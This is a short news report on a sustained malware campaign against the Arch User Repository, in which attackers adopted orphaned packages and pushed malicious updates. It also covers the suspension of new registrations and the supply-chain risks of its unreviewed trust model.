Arch User Repository hit by sustained malware attack; new user registration suspended
Tags OSS · Security · Supply Chain
The Arch User Repository (AUR), a community-driven package repository for Arch Linux with over 107,000 packages and 141,000 registered users, has been subjected to a sustained attack. Attackers created new accounts, adopted orphaned packages, and pushed malicious updates designed to install malware on users' systems. AUR maintainers spent several days in a 'Whac-A-Mole' response to each newly compromised package. The project has suspended new user registration indefinitely. The attack exploited the AUR's open collaboration model, which has no formal review process for package adoption or updates — any registered user can adopt orphaned packages with a single click.
Technical significance
This attack highlights the supply chain risks inherent in open-source repositories with minimal gatekeeping. With 14,000 orphaned packages available for immediate adoption and no review process, the AUR's trust model proved vulnerable. The incident may force a broader reckoning across the open-source ecosystem about how to balance openness with security, particularly as AUR helpers automate package installation for millions of users.